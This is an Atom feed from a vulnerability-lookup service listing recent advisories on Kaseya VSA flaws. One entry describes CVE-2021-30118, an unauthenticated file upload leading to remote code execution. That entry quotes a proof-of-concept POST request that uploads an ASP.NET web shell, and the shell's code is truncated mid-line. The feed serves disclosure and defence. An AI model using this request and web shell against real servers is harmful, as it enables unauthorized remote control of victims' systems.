<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://cve.radiocsirt.org/rss/recent/all/10</id>
  <title>Most recent entries from all</title>
  <updated>2026-10-05T10:43:15.977533+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>csirt@opendfir.org</email>
  </author>
  <link href="https://cve.radiocsirt.org" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent entries.</subtitle>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/certfr-2021-avi-514</id>
    <title>certfr-2021-avi-514 — De multiples vulnérabilités ont été découvertes dans Kaseya VSA. Elles
permettent à un attaquant de provoquer un contou…</title>
    <updated>2026-10-05T10:43:15.981332+00:00</updated>
    <content>certfr-2021-avi-514</content>
    <link href="https://cve.radiocsirt.org/vuln/certfr-2021-avi-514"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/cnvd-2021-50175</id>
    <title>cnvd-2021-50175</title>
    <updated>2026-10-05T10:43:15.981368+00:00</updated>
    <content>cnvd-2021-50175</content>
    <link href="https://cve.radiocsirt.org/vuln/cnvd-2021-50175"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/euvd-2026-26636</id>
    <title>EUVD-2026-26636</title>
    <updated>2026-10-05T10:43:15.981383+00:00</updated>
    <content>EUVD-2026-26636</content>
    <link href="https://cve.radiocsirt.org/vuln/euvd-2026-26636"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/fkie_cve-2021-30118</id>
    <title>fkie_cve-2021-30118</title>
    <updated>2026-10-05T10:43:15.981396+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>An attacker can upload files with the privilege of the Web Server process for Kaseya VSA Unified Remote Monitoring &amp; Management (RMM) 9.5.4.2149 and subsequently use these files to execute asp commands The api /SystemTab/uploader.aspx is vulnerable to an unauthenticated arbitrary file upload leading to RCE. An attacker can upload files with the privilege of the Web Server process and subsequently use these files to execute asp commands. Detailed description --- Given the following request: ``` POST /SystemTab/uploader.aspx?Filename=shellz.aspx&amp;PathData=C%3A%5CKaseya%5CWebPages%5C&amp;__RequestValidationToken=ac1906a5-d511-47e3-8500-47cc4b0ec219&amp;qqfile=shellz.aspx HTTP/1.1 Host: 192.168.1.194 Cookie: sessionId=92812726; %5F%5FRequestValidationToken=ac1906a5%2Dd511%2D47e3%2D8500%2D47cc4b0ec219 Content-Length: 12 &lt;%@ Page Language="C#" Debug="true" validateRequest="false" %&gt; &lt;%@ Import namespace="System.Web.UI.WebControls" %&gt; &lt;%@ Import namespace="System.Diagnostics" %&gt; &lt;%@ Import namespace="System.IO" %&gt; &lt;%@ Import namespace="System" %&gt; &lt;%@ Import namespace="System.Data" %&gt; &lt;%@ Import namespace="System.Data.SqlClient" %&gt; &lt;%@ Import namespace="System.Security.AccessControl" %&gt; &lt;%@ Import namespace="System.Security.Principal" %&gt; &lt;%@ Import namespace="System.Collections.Generic" %&gt; &lt;%@ Import namespace="System.Collections" %&gt; &lt;script runat="server"&gt; private const string password = "pass"; // The password ( pass ) private const string style = "dark"; // The style ( light / dark ) prot…</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/fkie_cve-2021-30118"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ghsa-9xr3-46q4-vwhg</id>
    <title>GHSA-9xr3-46q4-vwhg</title>
    <updated>2026-10-05T10:43:15.981440+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>Kaseya VSA before 9.5.5 allows remote code execution.</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ghsa-9xr3-46q4-vwhg"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/gsd-2021-30118</id>
    <title>gsd-2021-30118</title>
    <updated>2026-10-05T10:43:15.981456+00:00</updated>
    <content>gsd-2021-30118</content>
    <link href="https://cve.radiocsirt.org/vuln/gsd-2021-30118"/>
  </entry>
</feed>
